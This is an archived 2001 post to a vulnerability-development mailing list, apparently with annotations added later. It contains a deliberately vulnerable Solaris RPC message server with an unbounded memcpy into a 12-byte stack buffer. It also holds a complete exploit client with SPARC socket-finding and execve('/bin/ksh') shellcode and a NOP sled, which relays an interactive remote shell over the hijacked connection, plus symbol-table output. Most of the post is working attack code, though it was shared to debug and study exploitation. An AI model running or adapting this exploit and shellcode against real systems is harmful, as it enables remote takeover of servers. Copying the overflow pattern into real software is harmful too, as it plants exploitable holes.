Vulnerability Development mailing list archives

remote overflow detail


From: Minchu Mo <morris_minchu () iwon com>
Date: 30 Oct 2001 14:50:24 -0000

Mailer: SecurityFocus

Thanks to all the kind people for their valuable responses. Here is my source code and part of the debugging session, so you can see whether you can spot the problem:

Also some notes first:
1. For Golden_Eternity: to make sure the debugged process has a similar address map, I use adb to attach to the already-running process rather than launching the process from adb.
2. In the debugging session below I got a SIGSEGV in adb. On other days I did get an interactive shell on the client side: I could run "ls", "pwd", ..., but the server closed the hijacked socket file descriptor when I tried "more /etc/passwd".
3. For Dave Aitel: if I run the server freely, without adb or truss, the server neither crashes with SIGSEGV nor spawns a shell. That is what I meant by it seeming to skip the hacking code. (Review note: in the adb trace below the overflowed values only take effect when backup()'s register window is reloaded from the stack at its `restore`; if that window is never spilled during an undebugged run, the original return address survives, which would fit this symptom -- worth confirming.)
4. For dotslash () snosoft com: I will post the truss output in another thread; I am afraid this one is already too long.
================================
RPC interface file msg.x

/*
 * Wire-level bound for every variable-length field below.  rpcgen is
 * expected to turn len_val<MAXLEN> into an xdr_array() call with MAXLEN as
 * maxsize (the server binary imports xdr_array for exactly this), so the
 * server's decoder rejects arrays longer than 512 bytes.  This bounds only
 * the wire length: it says nothing about the 12-byte stack buffer the
 * server copies fromname into, and 3*MAXLEN plus the separators (1552)
 * still exceeds the server's 1536-byte reply buffer.
 */
const MAXLEN=512;
/* Reply: a NUL-terminated string of at most MAXLEN bytes.  Note the server
   builds replies of up to dynMemSize (1536) bytes, so a long request would
   produce a reply the generated xdr_svrmsg cannot encode. */
typedef string svrmsg<MAXLEN>;
/* Request field: counted byte array (C side: u_int len_val_len plus
   char *len_val_val).  Unlike `string`, it may contain NUL bytes, which is
   what lets the client send heap addresses with a leading 0x00. */
typedef char len_val<MAXLEN>;


typedef len_val fromName;   /* the field the server later copies into a 12-byte stack buffer */
typedef len_val toName;
typedef len_val MSG;


/* Argument of makemsg: the three counted arrays, in this order on the wire. */
struct  username_msg {
        fromName fromname;
        toName toname;
        MSG msg;
} ;


/* Program/version/procedure numbers used by both msg_svc and the clients. */
program MSGBOARD_PROG {
   version MSGBOARD_VERSION {
     svrmsg makemsg(username_msg)=1;
   } = 1;
} = 200000089;

====================================
The vulnerable RPC server:

#include "msg.h"
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Size of the heap buffer allocated per reply.  Three MAXLEN fields plus
   the 16 separator bytes (1552) exceed it, so the concatenation in
   makemsg_1 is not bounded by this value alone. */
int dynMemSize=1536;
extern int errno;           /* redundant: <errno.h> is already included above */
void backup(char*, int);    /* wrapper that adds one stack frame above the overflow */
void inbackup(char*, int);  /* unbounded memcpy into a 12-byte stack buffer (the bug under study) */

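/*
 * makemsg_1 -- server side of MSGBOARD_PROG/makemsg (see msg.x).
 *
 * Concatenates the three request fields into a freshly malloc'd buffer of
 * dynMemSize bytes as "<fromname>  said  to  <toname>==> <msg>" and hands
 * it back through the static `smsg`, as rpcgen server stubs do: the reply
 * must outlive this call, so the buffer from the previous call is released
 * on entry and replaced.
 *
 * un_msg  decoded request.  Every field is a counted byte array
 *         (len_val_len / len_val_val) that may legitimately contain NULs,
 *         which is why the copies below are memcpy with explicit lengths.
 * req     service request handle (unused).
 *
 * Returns &smsg on success, or NULL when the reply cannot be built
 * (allocation failure, or fields that would not fit in dynMemSize).  With
 * the usual rpcgen dispatcher a NULL result means no reply is sent.
 *
 * The call to backup() is the deliberate stack overflow this test server
 * exists to exercise (see inbackup below) and is kept on purpose.
 */
svrmsg *makemsg_1(username_msg *un_msg, struct svc_req *req)
{
	static svrmsg smsg;
	static const char said_to[] = "  said  to  ";   /* 12 bytes */
	static const char arrow[] = "==> ";             /* 4 bytes */
	char *backmsg;
	size_t fromInt, toInt, msgInt, total, off;

	(void)req;

	/* Release the reply buffer handed out on the previous call. */
	if (smsg != NULL) {
		free(smsg);
		smsg = NULL;
	}

	fromInt = un_msg->fromname.len_val_len;
	toInt = un_msg->toname.len_val_len;
	msgInt = un_msg->msg.len_val_len;

	/*
	 * Bound the concatenation.  Three fields of MAXLEN plus the two
	 * separators (3*512 + 16 = 1552) exceed the 1536-byte buffer, so
	 * without this check the copies below could run past backmsg and the
	 * reply could lose its terminating NUL.  '>=' keeps one byte for it.
	 */
	total = fromInt + (sizeof said_to - 1) + toInt + (sizeof arrow - 1) + msgInt;
	if (dynMemSize <= 0 || total >= (size_t)dynMemSize)
		return NULL;

	backmsg = malloc(dynMemSize);
	if (backmsg == NULL)
		return NULL;
	memset(backmsg, '\x00', dynMemSize);   /* also supplies the NUL terminator */

	/* Client takes some time to transmit the msg (original author's note). */
	sleep(5);

	/* Can't use strcpy: the payload's heap addresses contain \x00. */
	off = 0;
	memcpy(backmsg + off, un_msg->fromname.len_val_val, fromInt);
	off += fromInt;
	memcpy(backmsg + off, said_to, sizeof said_to - 1);
	off += sizeof said_to - 1;
	memcpy(backmsg + off, un_msg->toname.len_val_val, toInt);
	off += toInt;
	memcpy(backmsg + off, arrow, sizeof arrow - 1);
	off += sizeof arrow - 1;
	memcpy(backmsg + off, un_msg->msg.len_val_val, msgInt);

	/*
	 * Here call the vulnerable func: an unbounded copy of fromname (up to
	 * MAXLEN bytes, attacker controlled) into a 12-byte stack buffer.
	 */
	backup(un_msg->fromname.len_val_val, (int)fromInt);

	smsg = backmsg;
	return &smsg;
}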



/*
 * backup -- thin pass-through to inbackup().
 *
 * Its only visible effect is to add one stack frame (`save %sp,-0x60,%sp`
 * in the trace) between makemsg_1 and the overflow.  The bytes that spill
 * out of inbackup's tempDir land in this frame's register-window save
 * area, and it is this function's `ret; restore` (backup+0x18/0x1c in the
 * trace) that hands control to the overwritten return address; presumably
 * that is why the wrapper exists.
 */
void backup(char* bkFromName, int nmlen)
{
        inbackup(bkFromName, nmlen);
}

/*
 * inbackup -- the deliberately vulnerable sink.
 *
 * Copies nmlen caller-supplied bytes into a 12-byte stack buffer with no
 * bound check.  nmlen is the XDR length of the request's fromname field,
 * so a remote client controls both the bytes and the count (the exploit
 * client sends 252).  nmlen is a signed int: a negative value would turn
 * into a huge size_t for memcpy.
 *
 * In the adb trace below tempDir sits at %fp-0xc, i.e. just under the
 * caller's register-window save area, so the excess bytes overwrite the
 * saved %i0-%i7 (return address included) that backup() gets back at its
 * `restore` -- the trace shows them all coming back as the repeated
 * 0x6dc80.  A real server would refuse nmlen > sizeof tempDir (or use a
 * bounded copy); it is left as-is because the experiment log depends on it.
 */
void inbackup(char *bkFromName, int nmlen)
{
   char tempDir[12];

   memcpy(tempDir,bkFromName, nmlen);   /* stack overflow whenever nmlen > 12 */
}

======================================
=======

The hacking client


#include "msg.h"
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/select.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/*
 * findsckcode -- Solaris/SPARC "find the socket" stub, executed first.
 *
 * Read together with the disassembly in the comments it appears to:
 *   - use the bytes just *before* itself (a strbuf at %o7-60 whose buf
 *     points at %o7-48) as scratch -- in this payload that is the tail of
 *     the NOP sled main() lays down in front of it;
 *   - take the word at offset 12 (the `sethi` below, placeholder 0x1234),
 *     whose low 16 bits main() patches with the client's local port, clear
 *     its top byte (stb %g0,[%o7+4]) and use the result, 0x0002pppp, i.e.
 *     AF_INET:port, as the value to look for;
 *   - walk candidate fds downward (%l0 from 0xff), issuing trap 8 with
 *     %g1=0x36 and %o1=(0x54<<8)|0x91 -- an ioctl whose request code is
 *     the TI_GETPEERNAME counterpart of the ('T'<<8)|144 TI_GETMYNAME ioctl
 *     main() itself uses -- and comparing the first word of the returned
 *     sockaddr with the patched family:port word;
 *   - on a match, trap 8 with %g1=0x3e, %o1=9 and %o2=2,1,0, consistent
 *     with fcntl(fd, F_DUP2FD, n) on Solaris, then fall off its end into
 *     `shellcode`, which must immediately follow in memory.
 * Bytes 14-15 (the port) are the only part main() modifies.  There is no
 * NUL byte in the array, which is what lets main() measure it.
 */
char findsckcode[]=
    "\x20\xbf\xff\xff"     /* bn,a    <findsckcode-4>        */
    "\x20\xbf\xff\xff"     /* bn,a    <findsckcode>          */
    "\x7f\xff\xff\xff"     /* call    <findsckcode+4>        */
    "\x33\x02\x12\x34"     /* sethi   %hi(0x02PPPP),%i1  -- port placeholder, patched by main() */
    "\xa0\x10\x20\xff"     /* mov     0xff,%l0               */
    "\xa2\x10\x20\x54"     /* mov     0x54,%l1               */
    "\xa4\x03\xff\xd0"     /* add     %o7,-48,%l2            */
    "\xaa\x03\xe0\x28"     /* add     %o7,40,%l5             */
    "\x81\xc5\x60\x08"     /* jmp     %l5+8                  */
    "\xc0\x2b\xe0\x04"     /* stb     %g0,[%o7+4]            */
    "\xe6\x03\xff\xd0"     /* ld      [%o7-48],%l3           */
    "\xe8\x03\xe0\x04"     /* ld      [%o7+4],%l4            */
    "\xa8\xa4\xc0\x14"     /* subcc   %l3,%l4,%l4            */
    "\x02\xbf\xff\xfb"     /* bz      <findsckcode+32>       */
    "\xaa\x03\xe0\x5c"     /* add     %o7,92,%l5             */
    "\xe2\x23\xff\xc4"     /* st      %l1,[%o7-60]           */
    "\xe2\x23\xff\xc8"     /* st      %l1,[%o7-56]           */
    "\xe4\x23\xff\xcc"     /* st      %l2,[%o7-52]           */
    "\x90\x04\x20\x01"     /* add     %l0,1,%o0              */
    "\xa7\x2c\x60\x08"     /* sll     %l1,8,%l3              */
    "\x92\x14\xe0\x91"     /* or      %l3,0x91,%o1           */
    "\x94\x03\xff\xc4"     /* add     %o7,-60,%o2            */
    "\x82\x10\x20\x36"     /* mov     0x36,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "\x1a\xbf\xff\xf1"     /* bcc     <findsckcode+36>       */
    "\xa0\xa4\x20\x01"     /* deccc   %l0                    */
    "\x12\xbf\xff\xf5"     /* bne     <findsckcode+60>       */
    "\xa6\x10\x20\x03"     /* mov     0x03,%l3               */
    "\x90\x04\x20\x02"     /* add     %l0,2,%o0              */
    "\x92\x10\x20\x09"     /* mov     0x09,%o1               */
    "\x94\x04\xff\xff"     /* add     %l3,-1,%o2             */
    "\x82\x10\x20\x3e"     /* mov     0x3e,%g1               */
    "\xa6\x84\xff\xff"     /* addcc   %l3,-1,%l3             */
    "\x12\xbf\xff\xfb"     /* bne     <findsckcode+112>      */
    "\x91\xd0\x20\x08"     /* ta      8                      */
;

/*
 * shellcode -- execve("/bin/ksh", {"/bin/ksh", NULL}, <whatever %o2 holds>)
 * on Solaris/SPARC (trap 8 with %g1 = 0x0b).
 *
 * The call/%o7 trick yields the address of the trailing "/bin/ksh"
 * (call+32 = offset 40).  The stores then NUL-terminate the path at +8 and
 * build argv at +16/+20, so the stub writes up to 16 bytes *past* the end
 * of the string: whatever memory follows it must be writable (here the
 * zeroed remainder of the server's heap buffer).  No NUL byte inside, so
 * main() can measure it.
 */
char shellcode[]=
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode-4>          */
    "\x20\xbf\xff\xff"     /* bn,a    <shellcode>            */
    "\x7f\xff\xff\xff"     /* call    <shellcode+4>          */
    "\x90\x03\xe0\x20"     /* add     %o7,32,%o0   -- %o0 = &"/bin/ksh" */
    "\x92\x02\x20\x10"     /* add     %o0,16,%o1   -- %o1 = argv        */
    "\xc0\x22\x20\x08"     /* st      %g0,[%o0+8]  -- NUL after the path */
    "\xd0\x22\x20\x10"     /* st      %o0,[%o0+16] -- argv[0]           */
    "\xc0\x22\x20\x14"     /* st      %g0,[%o0+20] -- argv[1] = NULL    */
    "\x82\x10\x20\x0b"     /* mov     0x0b,%g1               */
    "\x91\xd0\x20\x08"     /* ta      8                      */
    "/bin/ksh"
;

/* Sled filler: 0x801c4011, which adb disassembles as `xor %l1,%l1,%g0` (a
   no-op writing to %g0).  main() repeats it 256 times in front of
   findsckcode; the tail of that run doubles as findsckcode's scratch area. */
static char nop[]="\x80\x1c\x40\x11";

extern int errno;                            /* redundant with <errno.h>, harmless */
/* clnt_call timeout.  It must exceed the server handler's sleep(5): a
   non-vulnerable server replies after that delay, and main() relies on
   seeing that reply (RPC_SUCCESS) to report "not vulnerable". */
static struct timeval TIMEOUT = { 25, 0 };

/* xdr_req stands in for the rpcgen-generated argument encoder
   (xdr_username_msg) so the request can be built by hand; the reply
   decoder passed to clnt_call is xdr_void, since no reply is expected
   from a successfully hijacked server. */
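/*
 * xdr_req -- hand-written encoder for the makemsg argument, used instead of
 * the rpcgen-generated xdr_username_msg.
 *
 * It serialises the same three counted byte arrays in the same order, but
 * with an unbounded maxsize (~0) in place of the MAXLEN bound rpcgen would
 * emit, so the client side never refuses an oversized field.  The server
 * still decodes with its generated routine and keeps its own bound, so what
 * the server accepts is decided there.
 *
 * xdrs  XDR stream (encode direction when invoked through clnt_call).
 * objp  request whose len_val_len / len_val_val pairs are emitted.
 * Returns TRUE on success, FALSE as soon as any xdr_array call fails.
 */
bool_t xdr_req(XDR *xdrs, username_msg *objp)
{
	/* Each field goes out as (count, bytes) via xdr_array of xdr_char. */
	if (!xdr_array(xdrs, &objp->fromname.len_val_val,
	               &objp->fromname.len_val_len, ~0, sizeof(char),
	               (xdrproc_t)xdr_char))
		return FALSE;
	if (!xdr_array(xdrs, &objp->toname.len_val_val,
	               &objp->toname.len_val_len, ~0, sizeof(char),
	               (xdrproc_t)xdr_char))
		return FALSE;
	if (!xdr_array(xdrs, &objp->msg.len_val_val,
	               &objp->msg.len_val_len, ~0, sizeof(char),
	               (xdrproc_t)xdr_char))
		return FALSE;
	return TRUE;
}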



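/* Repeat the 4-byte pattern `pat` `count` times into dst and return the
 * advanced pointer.  Used for the fake-return-address runs and the sled. */
static char *fill_pattern(char *dst, const char pat[4], int count)
{
	int i;

	for (i = 0; i < count; i++)
		*dst++ = pat[i % 4];
	return dst;
}

/* Local TCP port of the RPC connection, in host order, or -1.
 * getsockname() answers for a plain socket; on Solaris a TLI endpoint needs
 * sockmod pushed and TI_GETMYNAME instead (the constants below match
 * I_PUSH = ('S'<<8)|2 and TI_GETMYNAME = ('T'<<8)|144).  The strbuf's
 * maxlen is the real buffer size rather than 0xffff, so the kernel cannot
 * be told it may write past `local`. */
static int local_port(int sck)
{
	struct sockaddr_in local;
	socklen_t alen = sizeof local;

	memset(&local, 0, sizeof local);
	if (getsockname(sck, (struct sockaddr *)&local, &alen) == -1) {
		struct { unsigned int maxlen; unsigned int len; char *buf; } nb;

		ioctl(sck, (('S' << 8) | 2), "sockmod");   /* failure shows up in the next ioctl */
		nb.maxlen = sizeof local;
		nb.len = sizeof local;
		nb.buf = (char *)&local;
		if (ioctl(sck, (('T' << 8) | 144), &nb) == -1)
			return -1;
	}
	return ntohs(local.sin_port);
}

/*
 * Exploit client for the msg_svc test server.
 *
 * usage: rmsge host [retaddr]
 *
 * Sends one makemsg request whose three fields are laid out as:
 *   fromname  252 bytes: the fake return address repeated 63 times, then
 *             4 NULs.  This is what inbackup() copies into its 12-byte
 *             buffer, so it is what overwrites the saved register window.
 *   toname    252 bytes: same pattern plus 4 NULs (filler).
 *   msg       256-byte NOP sled, findsckcode, shellcode, NUL.
 * The server concatenates them into one heap buffer, so retaddr must land
 * in the sled.  0x6dc80 is the value observed with adb for this particular
 * build and is not portable; a different one may be given as argv[2].
 *
 * clnt_call is expected to FAIL: a vulnerable server never replies because
 * the shellcode replaces it with a shell, which is then driven over the
 * same TCP connection that findsckcode locates.  RPC_SUCCESS means the
 * server answered normally, i.e. the exploit did not work.
 */
int main(int argc, char *argv[])
{
	CLIENT *clnt;
	struct sockaddr_in adr;
	struct hostent *hp;
	username_msg umsg;
	enum clnt_stat rc;
	unsigned int ret_addr = 0x6dc80;
	char address[4];
	char buffer[2048];
	char *p, *msg_start;
	int sck, n;

	if (argc != 2 && argc != 3) {
		fprintf(stderr, "usage: %s host [retaddr]\n", argv[0]);
		exit(1);
	}
	if (argc == 3) {
		char *end;

		ret_addr = (unsigned int)strtoul(argv[2], &end, 0);
		if (*argv[2] == '\0' || *end != '\0') {
			fprintf(stderr, "bad return address: %s\n", argv[2]);
			exit(1);
		}
	}

	/* Resolve the target; port 0 lets clnttcp_create ask the portmapper. */
	memset(&adr, 0, sizeof adr);
	adr.sin_family = AF_INET;
	adr.sin_port = htons(0);
	adr.sin_addr.s_addr = inet_addr(argv[1]);
	if (adr.sin_addr.s_addr == INADDR_NONE) {
		if ((hp = gethostbyname(argv[1])) == NULL) {
			errno = EADDRNOTAVAIL;
			perror("error");
			exit(-1);
		}
		memcpy(&adr.sin_addr.s_addr, hp->h_addr, sizeof adr.sin_addr.s_addr);
	}

	/* Create an RPC session over TCP; the same connection carries the shell later. */
	sck = RPC_ANYSOCK;
	clnt = clnttcp_create(&adr, MSGBOARD_PROG, MSGBOARD_VERSION, &sck, 0, 0);
	if (clnt == NULL) {
		clnt_pcreateerror("error");
		exit(1);
	}

	n = local_port(sck);
	if (n < 0) {
		fprintf(stderr, "error: cannot determine local port\n");
		exit(1);
	}
	printf("port=%d connected! \n", n);
	fflush(stdout);
	sleep(3);   /* kept from the original; the server handler itself sleeps 5 s */

	/* Patch our port into the sethi at offset 12 of findsckcode (bytes 14-15). */
	findsckcode[12 + 2] = (unsigned char)((n & 0xff00) >> 8);
	findsckcode[12 + 3] = (unsigned char)(n & 0xff);

	/* Return address in network (SPARC) byte order.  Copied with memcpy:
	 * the old word store through a char[4] is both a strict-aliasing
	 * violation and, on SPARC, a possible unaligned-access trap. */
	ret_addr = htonl(ret_addr);
	memcpy(address, &ret_addr, sizeof address);

	memset(buffer, 0, sizeof buffer);   /* nothing uninitialised goes on the wire */

	umsg.fromname.len_val_val = buffer;
	umsg.fromname.len_val_len = 252;
	p = fill_pattern(buffer, address, 252);
	p += 4;                             /* four NULs, already zero */

	umsg.toname.len_val_val = p;        /* == &buffer[256] */
	umsg.toname.len_val_len = 252;
	p = fill_pattern(p, address, 252);
	p += 4;

	/* sled + findsckcode + shellcode + NUL.  sizeof rather than strlen so
	 * a NUL inside either stub could never silently truncate the payload. */
	msg_start = p;                      /* == &buffer[512] */
	p = fill_pattern(p, nop, 256);
	memcpy(p, findsckcode, sizeof findsckcode - 1);
	p += sizeof findsckcode - 1;
	memcpy(p, shellcode, sizeof shellcode - 1);
	p += sizeof shellcode - 1;
	*p++ = 0;
	umsg.msg.len_val_val = msg_start;
	/* Length derived from what was actually written; the old fixed 456
	 * sent 12 bytes of uninitialised stack after the terminator. */
	umsg.msg.len_val_len = (unsigned int)(p - msg_start);

	/* Our own encoder, and a void decoder because no reply is expected. */
	rc = clnt_call(clnt, makemsg, (xdrproc_t)xdr_req, (caddr_t)&umsg,
	               (xdrproc_t)xdr_void, NULL, TIMEOUT);
	if (rc == RPC_SUCCESS) {
		printf("\nerror: not vulnerable\n");
		exit(-1);
	}
	printf("sent!\n");

	/* The socket is now (hopefully) attached to /bin/ksh: relay stdin/stdout. */
	if (write(sck, "/bin/uname -a\n", 14) < 0)
		perror("write");
	for (;;) {
		fd_set fds;
		char buf[1024];
		int cnt;

		FD_ZERO(&fds);
		FD_SET(0, &fds);
		FD_SET(sck, &fds);
		/* The original treated -1 as "ready" and then polled an
		 * undefined fd_set; fail cleanly instead. */
		if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
			if (errno == EINTR)
				continue;
			perror("select");
			break;
		}
		if (FD_ISSET(0, &fds)) {
			cnt = read(0, buf, sizeof buf);
			if (cnt < 1) {
				/* EOF (cnt == 0) must end the loop; only a real
				 * would-block error is worth retrying. */
				if (cnt < 0 && (errno == EWOULDBLOCK || errno == EAGAIN))
					continue;
				break;
			}
			if (write(sck, buf, cnt) < 0)
				break;
		}
		if (FD_ISSET(sck, &fds)) {
			cnt = read(sck, buf, sizeof buf);
			if (cnt < 1) {
				if (cnt < 0 && (errno == EWOULDBLOCK || errno == EAGAIN))
					continue;
				break;
			}
			if (write(1, buf, cnt) < 0)
				break;
		}
	}
	return 0;
}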

============================

==> list the name list first

testbox:/home/minchumo nm -x msg_svc
msg_svc:

[Index]   Value      Size      Type  Bind  Other Shndx   
Name

[26]    |0x00000000|0x00000000|SECT |LOCL |0    
|25     |
[2]     |0x000100d4|0x00000000|SECT |LOCL |0    
|1      |
[3]     |0x000100e8|0x00000000|SECT |LOCL |0    
|2      |
[4]     |0x000103c4|0x00000000|SECT |LOCL |0    
|3      |
[5]     |0x000109e4|0x00000000|SECT |LOCL |0    
|4      |
[6]     |0x00010d10|0x00000000|SECT |LOCL |0    
|5      |
[7]     |0x00010d50|0x00000000|SECT |LOCL |0    
|6      |
[8]     |0x00010d80|0x00000000|SECT |LOCL |0    
|7      |
[9]     |0x00010d8c|0x00000000|SECT |LOCL |0    
|8      |
[10]    |0x00010f40|0x00000000|SECT |LOCL |0    
|9      |
[11]    |0x00011b20|0x00000000|SECT |LOCL |0    
|10     |
[12]    |0x00011b70|0x00000000|SECT |LOCL |0    
|11     |
[13]    |0x00011bc0|0x00000000|SECT |LOCL |0    
|12     |
[14]    |0x00011bc4|0x00000000|SECT |LOCL |0    
|13     |
[15]    |0x00011bc8|0x00000000|SECT |LOCL |0    
|14     |
[16]    |0x00021c14|0x00000000|SECT |LOCL |0    
|15     |
[17]    |0x00021c18|0x00000000|SECT |LOCL |0    
|16     |
[18]    |0x00021dfc|0x00000000|SECT |LOCL |0    
|17     |
[19]    |0x00021ebc|0x00000000|SECT |LOCL |0    
|18     |
[20]    |0x00021ee8|0x00000000|SECT |LOCL |0    
|19     |
[21]    |0x00021f1c|0x00000000|SECT |LOCL |0    
|20     |
[22]    |0x00021ffc|0x00000000|SECT |LOCL |0    
|21     |
[23]    |0x00000000|0x00000000|SECT |LOCL |0    
|22     |
[24]    |0x00000000|0x00000000|SECT |LOCL |0    
|23     |
[25]    |0x00000000|0x00000000|SECT |LOCL |0    
|24     |
[27]    |0x00000000|0x00000000|SECT |LOCL |0    
|26     |
[28]    |0x00000000|0x00000000|SECT |LOCL |0    
|27     |
[82]    |0x00021dfc|0x00000000|OBJT |GLOB |0    
|17     |_DYNAMIC
[30]    |0x00022010|0x00000000|OBJT |LOCL |0    
|21     |_END_
[62]    |0x00021c14|0x00000000|OBJT |GLOB |0    
|15     |_GLOBAL_OFFSET_TABLE_
[105]   |0x00021c18|0x00000000|OBJT |GLOB |0    
|16     |_PROCEDURE_LINKAGE_TABLE_
[29]    |0x00010000|0x00000000|OBJT |LOCL |0    
|1      |_START_
[51]    |0x00000000|0x00000000|NOTY |WEAK |0    
|UNDEF  |__1cH__CimplKcplus_fini6F_v_
[119]   |0x00000000|0x00000000|NOTY |WEAK |0    
|UNDEF  |__1cH__CimplKcplus_init6F_v_
[78]    |0x00021f0c|0x00000004|OBJT |GLOB |0    
|19     |___Argv
[93]    |0x00021f08|0x00000004|OBJT |GLOB |0    
|19     |__cg92_used
[36]    |0x00021f04|0x00000004|OBJT |LOCL |0    
|19     |__crt_scratch
[117]   |0x00021ee8|0x00000018|OBJT |GLOB |0    
|19     |__environ_lock
[107]   |0x00000000|0x00000000|NOTY |GLOB |0    
|ABS    |__fsr_init_value
[104]   |0x00021ff9|0x00000000|OBJT |GLOB |0    
|20     |_edata
[58]    |0x00022010|0x00000000|OBJT |GLOB |0    
|21     |_end
[57]    |0x00021f00|0x00000004|OBJT |GLOB |0    
|19     |_environ
[109]   |0x00011c14|0x00000000|OBJT |GLOB |0    
|14     |_etext
[90]    |0x00000000|0x00000000|NOTY |WEAK |0    
|UNDEF  |_ex_deregister
[33]    |0x00011bc0|0x00000000|NOTY |LOCL |0    
|12     |_ex_range0
[49]    |0x00011bc0|0x00000000|NOTY |LOCL |0    
|12     |_ex_range1
[61]    |0x00000000|0x00000000|NOTY |WEAK |0    
|UNDEF  |_ex_register
[32]    |0x00021ecc|0x00000000|NOTY |LOCL |0    
|18     |_ex_shared0
[48]    |0x00021edc|0x00000000|NOTY |LOCL |0    
|18     |_ex_shared1
[34]    |0x00010f40|0x00000000|NOTY |LOCL |0    
|9      |_ex_text0
[50]    |0x00011b20|0x00000000|NOTY |LOCL |0    
|9      |_ex_text1
[88]    |0x00021c60|0x00000000|FUNC |GLOB |0    
|UNDEF  |_exit
[118]   |0x00011b70|0x00000050|FUNC |GLOB |0    
|11     |_fini
[73]    |0x00011b20|0x00000050|FUNC |GLOB |0    
|10     |_init
[110]   |0x00011bc4|0x00000004|OBJT |GLOB |0    
|13     |_lib_version
[42]    |0x000111f8|0x00000024|FUNC |LOCL |0    
|9      |_msgout
[45]    |0x00022000|0x00000004|OBJT |LOCL |0    
|21     |_rpcpmstart
[41]    |0x00021f18|0x00000004|OBJT |LOCL |0    
|19     |_rpcsvccount
[40]    |0x00021f14|0x00000004|OBJT |LOCL |0    
|19     |_rpcsvcstate
[52]    |0x00010f40|0x000000d0|FUNC |GLOB |0    
|9      |_start
[69]    |0x00021cc0|0x00000000|FUNC |GLOB |0    
|UNDEF  |alarm
[67]    |0x00021c48|0x00000000|FUNC |GLOB |0    
|UNDEF  |atexit
[60]    |0x00011180|0x00000028|FUNC |GLOB |0    
|9      |backup
[97]    |0x00021d98|0x00000000|FUNC |GLOB |0    
|UNDEF  |close
[43]    |0x00011230|0x00000118|FUNC |LOCL |0    
|9      |closedown
[35]    |0x00000000|0x00000000|FILE |LOCL |0    
|ABS    |crt1.s
[31]    |0x00000000|0x00000000|FILE |LOCL |0    
|ABS    |crti.s
[47]    |0x00000000|0x00000000|FILE |LOCL |0    
|ABS    |crtn.s
[80]    |0x00021db0|0x00000000|FUNC |GLOB |0    
|UNDEF  |dup2
[112]   |0x00021f10|0x00000004|OBJT |GLOB |0    
|19     |dynMemSize
[91]    |0x00021f00|0x00000004|OBJT |WEAK |0    
|19     |environ
[68]    |0x00021c54|0x00000000|FUNC |GLOB |0    
|UNDEF  |exit
[59]    |0x00021d74|0x00000000|FUNC |GLOB |0    
|UNDEF  |fork
[96]    |0x00021c6c|0x00000000|FUNC |GLOB |0    
|UNDEF  |free
[76]    |0x00021d50|0x00000000|FUNC |GLOB |0    
|UNDEF  |freenetconfigent
[79]    |0x00021d2c|0x00000000|FUNC |GLOB |0    
|UNDEF  |getenv
[71]    |0x00021d38|0x00000000|FUNC |GLOB |0    
|UNDEF  |getnetconfigent
[100]   |0x00021d8c|0x00000000|FUNC |GLOB |0    
|UNDEF  |getrlimit
[103]   |0x000111b8|0x0000002c|FUNC |GLOB |0    
|9      |inbackup
[113]   |0x00011570|0x00000334|FUNC |GLOB |0    
|9      |main
[56]    |0x00011020|0x0000014c|FUNC |GLOB |0    
|9      |makemsg_1
[72]    |0x00021c78|0x00000000|FUNC |GLOB |0    
|UNDEF  |malloc
[116]   |0x00021c9c|0x00000000|FUNC |GLOB |0    
|UNDEF  |memcpy
[106]   |0x00021c84|0x00000000|FUNC |GLOB |0    
|UNDEF  |memset
[38]    |0x00000000|0x00000000|FILE |LOCL |0    
|ABS    |msg_proc.c
[1]     |0x00000000|0x00000000|FILE |LOCL |0    
|ABS    |msg_svc
[39]    |0x00000000|0x00000000|FILE |LOCL |0    
|ABS    |msg_svc.c
[46]    |0x00000000|0x00000000|FILE |LOCL |0    
|ABS    |msg_xdr.c
[44]    |0x00011358|0x00000204|FUNC |LOCL |0    
|9      |msgboard_prog_1
[99]    |0x00021da4|0x00000000|FUNC |GLOB |0    
|UNDEF  |open
[70]    |0x00021d20|0x00000000|FUNC |GLOB |0    
|UNDEF  |openlog
[92]    |0x00021d80|0x00000000|FUNC |GLOB |0    
|UNDEF  |perror
[87]    |0x00021dbc|0x00000000|FUNC |GLOB |0    
|UNDEF  |setsid
[65]    |0x00021cb4|0x00000000|FUNC |GLOB |0    
|UNDEF  |signal
[86]    |0x00021d08|0x00000000|FUNC |GLOB |0    
|UNDEF  |sigset
[64]    |0x00021c90|0x00000000|FUNC |GLOB |0    
|UNDEF  |sleep
[81]    |0x00021dc8|0x00000000|FUNC |GLOB |0    
|UNDEF  |svc_create
[84]    |0x00022008|0x00000004|OBJT |GLOB |0    
|21     |svc_max_pollfd
[120]   |0x0002200c|0x00000004|OBJT |GLOB |0    
|21     |svc_pollfd
[83]    |0x00021d5c|0x00000000|FUNC |GLOB |0    
|UNDEF  |svc_reg
[101]   |0x00021d68|0x00000000|FUNC |GLOB |0    
|UNDEF  |svc_run
[75]    |0x00021cd8|0x00000000|FUNC |GLOB |0    
|UNDEF  |svc_sendreply
[89]    |0x00021d44|0x00000000|FUNC |GLOB |0    
|UNDEF  |svc_tli_create
[74]    |0x00021cf0|0x00000000|FUNC |GLOB |0    
|UNDEF  |svcerr_decode
[85]    |0x00021ce4|0x00000000|FUNC |GLOB |0    
|UNDEF  |svcerr_noproc
[66]    |0x00021cfc|0x00000000|FUNC |GLOB |0    
|UNDEF  |svcerr_systemerr
[114]   |0x00021ca8|0x00000000|FUNC |GLOB |0    
|UNDEF  |syslog
[55]    |0x00022004|0x00000004|OBJT |GLOB |0    
|21     |t_errno
[54]    |0x00021d14|0x00000000|FUNC |GLOB |0    
|UNDEF  |t_getstate
[37]    |0x00000000|0x00000000|FILE |LOCL |0    
|ABS    |values-Xa.c
[102]   |0x00011a30|0x00000044|FUNC |GLOB |0    
|9      |xdr_MSG
[94]    |0x00021dec|0x00000000|FUNC |GLOB |0    
|UNDEF  |xdr_array
[98]    |0x00021de0|0x00000000|FUNC |GLOB |0    
|UNDEF  |xdr_char
[111]   |0x00011980|0x00000044|FUNC |GLOB |0    
|9      |xdr_fromName
[63]    |0x00011910|0x0000005c|FUNC |GLOB |0    
